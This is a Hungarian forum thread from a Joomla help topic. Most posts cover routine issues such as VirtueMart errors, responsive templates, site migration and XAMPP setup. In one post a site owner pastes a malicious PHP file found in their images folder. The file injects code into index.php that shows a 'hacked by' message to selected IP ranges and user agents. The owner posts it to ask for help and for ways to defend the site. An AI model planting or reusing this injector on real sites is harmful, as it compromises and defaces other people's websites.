Hirdetés

2024. május 5., vasárnap

Gyorskeresés

Útvonal

Fórumok  »  Szoftverfejlesztés  »  Joomla! topic

Hozzászólások

(#651) zeorsdfd válasza hege01 (#650) üzenetére


zeorsdfd
senior tag

Sztem ezt keresed: Tabulizer

(#652) hege01 válasza zeorsdfd (#651) üzenetére


hege01
tag

Köszi,
Este megnézem, lehet hogy jó lesz.

(#653) hege01 válasza zeorsdfd (#651) üzenetére


hege01
tag

Jah, látom ez fizetős, méghozzá nem is olcsó.
Valami hasonló ingyenesben létezik?
Keresgélek én is hátha...

(#654) pumatom


pumatom
aktív tag

Sziasztok!

Virtuemart-os problémám akadt; frissítettük a virtuemartot, és azóta amikor létrehoznék egy terméket, vagy kategóriát szerkesztenék a következő hibát írja ki:

vmError: VmTableData SEF helyettesítő szöveg hiányzik a rekordban! A rekord nem menthető a SEF helyettesítő szöveg hiányában.

A sef helyettesítő szöveg kivan töltve, tehát nem értem mi a baja. A frissítés előtt nem csinált ilyet sosem.
Amíg ez a hiba fennáll, nem lehet új terméket/kategóriát létrehozni/szerkeszteni.

Már próbáltam új SEF komponenseket hozzáadni, de akkor az url-ek nem jelennek meg, csak egy hibát ír ki.

Mi lehet itt a probléma? :F

[ Szerkesztve ]

(#655) zeorsdfd válasza pumatom (#654) üzenetére


zeorsdfd
senior tag

#627-től nagyjából erről volt szó;-)

esetleges megoldási lehetőség

[ Szerkesztve ]

(#656) pumatom válasza zeorsdfd (#655) üzenetére


pumatom
aktív tag

Szia, Köszönöm, így már nem jelentkezik a hiba. :R

2 hiba volt az új verzióval, az egyiket sikerült manuálisan megoldani, viszont erre már nem jöttem rá.

Visszatettem én is az előző verziót... :U

(#657) timelord1987


timelord1987
őstag

Sziasztok!

Hogy tudok joomla 2.5 alatt egy sablont mobil telefon kompatibilissé tenni?

(#658) zeorsdfd válasza timelord1987 (#657) üzenetére


zeorsdfd
senior tag

Ha jól sejtem reszponzív sablont akarsz.
Ezt magában a sablon css filejában kéne át-(bele)írni, sztem nincs ilyen "konverter".
Ha létezik reszponzív változtata a sablonnak, akkor egyszerűen cseréld le. Erre kicsi az esély, tehát esetleg válts sablont, olyat ami megfelel.

Továbbá érdemes 3.x-re frissíteni a joomlát mert sokkal jobban támogatja a reszponzivitást, már maga a gyári alapsablon is az pl.

A másik lehetőség, hogy csinálsz egy m.mydomain.hu aldomaint és oda egy mobilra optimalizált sablont teszel és a kisképernyősöket átirányítod oda.

(#659) G.F. válasza zeorsdfd (#658) üzenetére


G.F.
aktív tag

Mondjuk az, hogy a joomla3 jobban támogatja a reszponzivitást, kissé badarság, de a többi nagyjából stimmel. Max azt mondhatni, hogy a joomla3-ban már reszponzív az alapsablon. A reszponzív sablon készítése html5+css3(+js esetleg). A legegyszerűbb járható út egy új, reszponzív sablon készítése. Ha ez nem tiszta, egy régi átalakításával már próbálkozni is reménytelen, mivel nem látni át, főleg egy összetettebb gyári sablon esetén a szerkezetet. Ha csinálsz egyet, akkor meg teljesen kézben tartható. Ha mobil változatot csinálsz, az meg tableteken nem biztos hogy szépen látszik. Léteznek joomlához framework-ök (pl. Gantry és még számtalan társa), amelyekkel viszonylag könnyedén gyárthatsz saját template-et.

[ Szerkesztve ]

-gf-

(#660) zeorsdfd válasza G.F. (#659) üzenetére


zeorsdfd
senior tag

Végsősoron igen, csak CSS az egész, nade, egy ilyen nyitóoldal azért még engem is meggyőz, hogy nem teljesen badarság amit mondok;-)
http://www.joomla.org/3/en (görgess le és nézd az első mondatokat)

[ Szerkesztve ]

(#661) G.F. válasza zeorsdfd (#660) üzenetére


G.F.
aktív tag

Igen, az admin felület is reszponzív, de általában nem mobilról adminisztrálod az oldalad, főleg azt szeretnéd, hogy mobilon is élvezhető legyen a tartalom és nyilván jobban figyelnek a modulok, komponensek és magának az alap joomla rendszer kimeneténeka reszponzivitására, már csak a joomla 3 korából adódóan, de ez a 2.5-ösre is igaz, nem kell félni. A 3-asra is vannak nem reszponzív kiegészítők, és template-ek.
Csináltam már reszponzív sablont, 2.5-ösre is és 3-asra is, ezért mondtam az előzöekben leírtakat.

[ Szerkesztve ]

-gf-

(#662) greenity


greenity
aktív tag

Sziasztok!

Újfent problémába ütköztünk a joomla használata során. Édesapám mindenáron fck editorral akarna dolgozni (talált hozzá vmi kézikönyvet) de nem találok olyan forrást ami megfelelne a bővítmény kezelőnek, ebben kérném a segítségeteket.
Előre is köszönöm.

szerk..: 1.5-s joomla-t használnak

[ Szerkesztve ]

"Egy mosolynál jobb a több"

(#663) gyenge47 válasza greenity (#662) üzenetére


gyenge47
tag

Ha nem haragszol akkor kezdd azzal, hogy cseréled azt a joomla-t. Borzasztóan elavult és konkrétan a youtube on is van videó, hogy hogyan lehet pár perc alatt törni.

Nekem 1.7es oldalamról jött egy e-mail, hogy valaki csak úgy adminként regisztrált. Annyi volt a szerencsém, hogy gyors voltam és töröltem.

(#664) greenity válasza gyenge47 (#663) üzenetére


greenity
aktív tag

Értem, szólok nekik, de nem ő az egyetlen admin, ezért ez így nehézkes.

"Egy mosolynál jobb a több"

(#665) gyenge47 válasza greenity (#664) üzenetére


gyenge47
tag

Új generációknál már sokkal könnyebb a verzió-váltás is, jó esetben 3 kattintás. 1.5 sajnos sokaknak megmaradt és sajnos elég sok veszélyt rejt magában. Egyszer kell csak váltani, addig viszont szerintem már nem érdemes több időt tölteni a régivel.

(#666) greenity válasza gyenge47 (#665) üzenetére


greenity
aktív tag

Mondtam apunak, megbeszéli az illetékessel. Az FCK-t meg megoldottuk :)

"Egy mosolynál jobb a több"

(#667) G.F. válasza gyenge47 (#665) üzenetére


G.F.
aktív tag

Egyébként a magasabb verzió sem biztosíték semmire, mert mint sokan sokszor elmondták, nem a joomla verziók rejtenek biztonsági rést, hanem főleg az ilyen-olyan kiegészítők, és sokszor meg a nem megfelelő szerverbeállítások. Van 1.0.15 - 3.4-esig működő weblapom, tudom mit beszélek. Legutóbb 2.5-ös mellé fészkelte be magát spamküldő script, egy ismert komponens biztonsági rését kihasználva, másik helyen meg 1.0.15-öt még sohasem törték fel. Persze igazad van, de van ahol szükségből kell működtetni. A migrálás pedig elég nagy munka...

-gf-

(#668) gyenge47 válasza G.F. (#667) üzenetére


gyenge47
tag

Nyilván igazad van, de az 1.5-1.7 széria jelenleg a legsebezhetőbb, a kérdésből adódóan pedig úgy gondolom, hogy nem a legbonyolultabb oldalról beszélünk, néhány tucat oldalnál pedig a migrálás kimerülhet egy új oldal építésében és cikkek átmásolgatásában. Új verziónál pedig tényleg 2 katt a frissítés, amit nem érdemes figyelmen kívül hagyni.

Törölt, vagy tört tárhelyet sem kis munka visszahozni, ha nem éppen ideális a biztonsági mentés.

[ Szerkesztve ]

(#669) timelord1987


timelord1987
őstag

Sziasztok!

Holt találók ehhez hasonló sablont?
http://www.perfect-it.hu/

(#670) zeorsdfd válasza timelord1987 (#669) üzenetére


zeorsdfd
senior tag

Ez ugye nem joomla sablon...így aztán nem egyszerű a kérdés.
Bár ki tudja, lehet, hogy valaki felismeri a 10000000 db legyártott sablon közül ezt és beteszi a választ ide. ;]

[ Szerkesztve ]

(#671) timelord1987 válasza zeorsdfd (#670) üzenetére


timelord1987
őstag

Hasonló felépítésű sablont keresek Joomlahoz.

(#672) G.F. válasza timelord1987 (#671) üzenetére


G.F.
aktív tag

Szerintem a felépítése teljesen klasszikus. Csinálj egyet, vagy egy létezőt szabj át. pl Youtheme Nano2

-gf-

(#673) r3dsnake


r3dsnake
nagyúr

1.5-ös joomla oldalt szeretnék költöztetni 3.x-re. Milyen kiegészítővel lehet ezt a lehető legkevesebb adatveszteséggel kiviteleni? A template tudom, hogy kuka, de legalább az oldal struktúrája (menürendszer, szekció) maradjon meg.

Köszi!

(#674) G.F. válasza r3dsnake (#673) üzenetére


G.F.
aktív tag

Én a [redMIGRATOR] nevű komponenssel migráltam egy 1.5-ös oldalt, ezt gyugodt szívvel ajánlom, mert korrekt módon tette a dolgát. Nem tudom mennyire olvastál utánna, de ezek a kiegészítők gyakorlatilag a cikkek migrálását végzik, és ott is van sok kézi munka.

-gf-

(#675) tamas1985


tamas1985
aktív tag

Sziasztok!

Olyan megoldást keresnék hogy egy joomla rendszer a feltöltött képeket egy felhő alapú tárhelyre mentse, ez megoldható valahogy, keresgéltem de még nem találtam megoldást. Előre is köszi

(#676) emitter válasza tamas1985 (#675) üzenetére


emitter
őstag

Szia, ezek a megoldások esetleg megfelelnek?
[link]

(#677) zeorsdfd


zeorsdfd
senior tag

Ki tudja, lehet -e cikkekhez olyan dátumot rendelni, ami alapján aztán ezeket egy naptár modulban meg lehetne jeleníteni, azaz Eseményekké alakítani őket.
Tulajdonképpen az Art Calendar kiegészítő tudja, de az érdekel, hogy van -e valami ingyenes megoldás?

(#678) Ra's al Ghul


Ra's al Ghul
senior tag

Sziasztok!

Egy kis segítséget szeretnék kérni. A weboldalamon a Joomla 1.5.15 verziója fut. A lényeg az, hogy az képek mappában (/images/) találtam egy cell.pHp fájlt amiben biztos vagyok, hogy nem én raktam oda. A fájlt megnyitva a következő php kód fogad:

?><?php

echo '[vuln]';

$e=$_SERVER[DOCUMENT_ROOT].'/index.php';
if (!is_writable($e)) exit;

$b=@file_get_contents($e);
$i=strrev("uoy yb dekcah");
if(strpos($b,$i))exit;

$c='<?php $r=$_SERVER["REMOTE_ADDR"];if((preg_match("/69.42./",$r)) OR (preg_match("/compatible; MSIE 9.0; Windows NT 6.0; Trident\/5.0/i",$_SERVER["HTTP_USER_AGENT"])) OR (preg_match("/72.20./",$r)) OR (preg_match("/141.101./",$r)) OR(isset($_GET["z"]))){echo "'.$i.'";exit;}?>'."\r\n";

$b=$c.$b;

$f=fopen($e,"w");
fwrite($f,$b);
fclose($f);

?>

Erre kérnék valami ötletet, hogy mi is lehet ez?

Ezen kívül a weboldal gyökérkönyvtárában találtam egy delete-me nevű gif fájlt (delet-me.gif), amit ha megnyítok akkor a következő fogad: "Hacked by Hmei7"

Van valami ötletetek, hogy miként lehet védekezni ilyen fajta támadások ellen?

[ Szerkesztve ]

Theatricality and deception are powerful agents to the uninitiated.

(#679) zeorsdfd válasza Ra's al Ghul (#678) üzenetére


zeorsdfd
senior tag

Alapvetően az elavult joomla frissítését szoktuk itt javasolni az ilyen esetekben is. Az 1.5.x-es az bizony nagyon régi.
Illetve érdemes legalább a kiegészítőket átnézni, frissíteni, vagy egyszerűen kikapcsolni, ha problémás.

(#680) cigam


cigam
félisten

Letöltöttem a (portable)xamp-ot és a 3.3-as joomla-t. El is jutok a telepítésig, de az Adatbázistáblák létrehozása csak pörög, de nem jut előre.

Mit rontok el?

Freeware, és akciós programok egy helyen https://www.facebook.com/freewarenews

(#681) zeorsdfd válasza cigam (#680) üzenetére


zeorsdfd
senior tag

itt van valami erről.
Nekem ezek az offline ügyek mindig nehézkesek, ezért használok ingyenes, online szolgáltatást teszteléshez. olyat, ahol egy gomb a joomla telepítés... priviben adok egy eléggé jót, nem merek reklámozni:-)

(#682) cigam válasza zeorsdfd (#681) üzenetére


cigam
félisten

Köszi a tippet, jöhet a privát.

Freeware, és akciós programok egy helyen https://www.facebook.com/freewarenews

(#683) wwhy


wwhy
veterán

Újonc joomlásként kérnék egy kis segítséget (aztán sokat ;] ): adott egy webshop telepítő, ami joomla 2.5x-et tesz fel, majd utána a Virt.M-ot. A mediacenternél lévő tárhelyen minden lefut szépen, OK, stb. más helyen viszont (fiberhost) a joomla ha kiléptem, már nem enged vissza az adminba, ha fejre állok, akkor sem.
Emiatt 3x újratettem az egész oldalt, amíg megtaláltam ezt:‏a 8. pontban lévő beállítást elvégezve minden frankó‏. Igaz, h van megoldás, de magyarázat nemigen (nekem), állítólag bug, de akkor miért nem mindenhol bug a bug? :)

ELADÓ <<narancs Honor Magic5 Ultimate>> <<Újszerű, doboz, minden kellék>>

(#684) cigam válasza cigam (#680) üzenetére


cigam
félisten

Az 1.8.3-as xampp a ludas, 1.8.2-vel simán beröffent.

[ Szerkesztve ]

Freeware, és akciós programok egy helyen https://www.facebook.com/freewarenews

(#686) wwhy


wwhy
veterán

ingyenes matematikai műveletes captchát tudtok ajánlani? Vagy nagyon egyszerűt, ami pár szám+betű kombináció, nem fél mondat :)

[ Szerkesztve ]

ELADÓ <<narancs Honor Magic5 Ultimate>> <<Újszerű, doboz, minden kellék>>

(#687) cigam


cigam
félisten

Létezik valahol egy dummies, vagy 24 óra alatt könyv a 3.3-as joomla-hoz? Egy régi 1.5-ös könyvet találtam, és a magya wiki is az 1.5-ről szól :(

Freeware, és akciós programok egy helyen https://www.facebook.com/freewarenews

(#688) DopeBob


DopeBob
addikt

Sziasztok,

Joomlához keresnék valami nagyon egyszerű hirdetőtábla szerű modult. Olyan amihez nem kell regisztrálni, meg lehet adni nevet/telefonszámot/meg valami hirdetés szöveget és kb ennyi. Ha pár előre felvitt kategóriából még esetleg lehet választani az már jó.

MZ/X

(#689) zeorsdfd válasza DopeBob (#688) üzenetére


zeorsdfd
senior tag

Nem teljesen értem, hogy milyen "hirdetőtáblát" akarsz, de mintha ezt az alap joomla is tudná.
A "hirdetés szövege" = "beküldött cikk", a kategóriákat előre meghatározod és mehet a menet.

(#690) LOTR


LOTR
addikt

sziasztok

megkértek, hogy módosítsak egy weblapot, ami joomlával lett szerkesztve/létrehozva, amihez nem értek, tehát magát a joomlát nem igazán tudom kezelni
hogy lehet azt megcsinálni, hogy van egy kész weblap és a kezdőlapja semmi más ne legyen, csak kettő darab kép, amik egy-egy linkre mutatnak, amiből az egyik kép linkje a jelenlegi weblap kezdőlapja
tehát nagyjából így nézzen ki (a két smiley a két kép):

*******************************

weblapválasztó, üdvözöljük...
:D :DDD

*******************************

előre is köszi

[ Szerkesztve ]

One Ring to rule them all

(#691) zeorsdfd válasza LOTR (#690) üzenetére


zeorsdfd
senior tag

Csinálsz egy index.html-t és ráirányítod htaccess file-al a homepaget.
Joomlán belül is meglehet, de jóval körülményesebb. ( pl egyedi template a homepagera, vagy van ilyen komponens is)

(#692) Met


Met
nagyúr

Sziasztok!

A topmenü fölé beraktam egy egyéni html modult, de a háttér a menü háttérszíne, cserélgettem a modul pozíciókat, le is tiltottam a menüt de továbbra is van háttérszíne.
Hogy lehetne ezt megszüntetni? Artissteer-el készült a sablon ha számít.

[ Szerkesztve ]

"If in doubt, flat out!" Colin McRae

(#693) baracsi válasza Met (#692) üzenetére


baracsi
tag

Erre így nem lehet választ adni, mert függ attól a sablontól is, amit használsz, az abban beállított stílusoktól. Érdemes megvizsgálni különböző eszközökkel adott element-et. Pl.: Mozilla Firefoxban jobb klikk arra a területre és `Elem vizsgálata`, vagy ha Firefox-ot használsz, akkor tedd fel a Web developer extension-t ([link]).

[ Szerkesztve ]

(#694) Met válasza baracsi (#693) üzenetére


Met
nagyúr

Sikerült kikerülni a problémát, idáig menü-fejléc-tartalom volt a sorrend, átraktam fejléc-menü-tartalom-ra, a fejlécbe beraktam a képet, a menü alá meg egy modulba a képet.

Ebben esetleg tudnál segíteni?

[ Szerkesztve ]

"If in doubt, flat out!" Colin McRae

(#695) aldebaran válasza Met (#694) üzenetére


aldebaran
őstag

[link]

Gandhi mondta: "Élj úgy, mintha meghalnál holnap. Tanulj úgy, mintha örökké élnél."

(#696) Met


Met
nagyúr

A föoldalon van egy gomb ami egy cikkre hivatkozna de ha bemásolom a cikk címét nem jelenik meg, a főoldal tölt be újra.
Ezzel a kóddal tettem be a gombot

<form action="http://address.com/page1.html">
<p style="text-align: center;"><input class="button art-button" type="submit" value="Tovább" />
</p>
<p style="text-align: center;">&nbsp;</p>
</form>

Az address.com oldal bejön de a cikk nem, a link amit próbálok bemásolni az jó mert a böngésző címsorából betölt. Mi a hiba?

"If in doubt, flat out!" Colin McRae

(#697) Alex91


Alex91
félisten

Joomla 1.x-es verzio. (Pontosan nem tudom, de 1.5 alatti.)

Nem tudom, hogy mi tortent, de nem lehet elerni a weboldalt, azt irja, hogy: Nincs kapcsolat az adatbazis szerverrel.

Egy uj cikket raktam be. A gyorsitotar uritese, es valami (most nem tudom a menu pontos nevet) visszavetelre nyomtam ra, amit eddig nem hasznaltam. Lehet, hogy ezek okoztak a gondot?

(A cikket megneztem, akkor meg mukodott. De mar nem emlekszem, hogy ezeket a menupontokat a cikk kirakasa eloot vagy utan nyomtam meg.)

Dicsõséges nagyurak, hát Hogy vagytok? Viszket-e ugy egy kicsit a Nyakatok? Uj divatu nyakravaló Készül most Számotokra... nem cifra, de Jó szoros.

(#698) G.F. válasza Alex91 (#697) üzenetére


G.F.
aktív tag

Ha nincs kapcsolat az adatbázissal akkor a configuration.php sérült

[ Szerkesztve ]

-gf-

(#699) Alex91 válasza G.F. (#698) üzenetére


Alex91
félisten

Az nem lehet, hogy csak leallt az sql server? Holnap tudom ujrainditani.

Dicsõséges nagyurak, hát Hogy vagytok? Viszket-e ugy egy kicsit a Nyakatok? Uj divatu nyakravaló Készül most Számotokra... nem cifra, de Jó szoros.

(#700) G.F. válasza Alex91 (#699) üzenetére


G.F.
aktív tag

De lehet, mert amiket csináltál, attól nem sérülhetett a fájl.

-gf-

Útvonal

Fórumok  »  Szoftverfejlesztés  »  Joomla! topic
Copyright © 2000-2024 PROHARDVER Informatikai Kft.